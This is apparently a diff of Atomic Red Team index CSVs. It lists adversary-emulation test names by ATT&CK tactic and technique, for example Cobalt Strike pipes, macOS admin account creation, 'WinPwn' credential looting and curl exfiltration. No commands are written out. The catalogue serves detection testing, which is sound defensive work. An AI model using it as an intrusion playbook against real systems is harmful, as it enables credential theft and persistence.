 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -633,6 +638,7 @@ privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Sid
 privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -640,8 +646,11 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -732,6 +741,11 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scrip
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
 execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
+execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
+execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
+execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
+execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
+execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -860,6 +874,8 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
 persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
+persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
@@ -915,13 +931,17 @@ persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Window
 persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
 persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -1171,6 +1191,7 @@ discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b67
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
 discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
@@ -1272,6 +1293,7 @@ discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,
 discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
 discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
+discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
 discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
 discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
@@ -1494,10 +1516,14 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
@@ -37,6 +37,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -27,6 +27,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -63,6 +64,9 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
@@ -101,6 +105,9 @@ persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -128,6 +135,9 @@ privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Appl
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
@@ -203,6 +213,9 @@ execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a5
 execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
@@ -330,8 +330,8 @@ defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,Wi
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -466,8 +466,8 @@ privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
 privilege-escalation,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -534,6 +534,11 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
+execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
+execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
+execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
+execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
+execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
@@ -660,8 +665,8 @@ persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify R
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
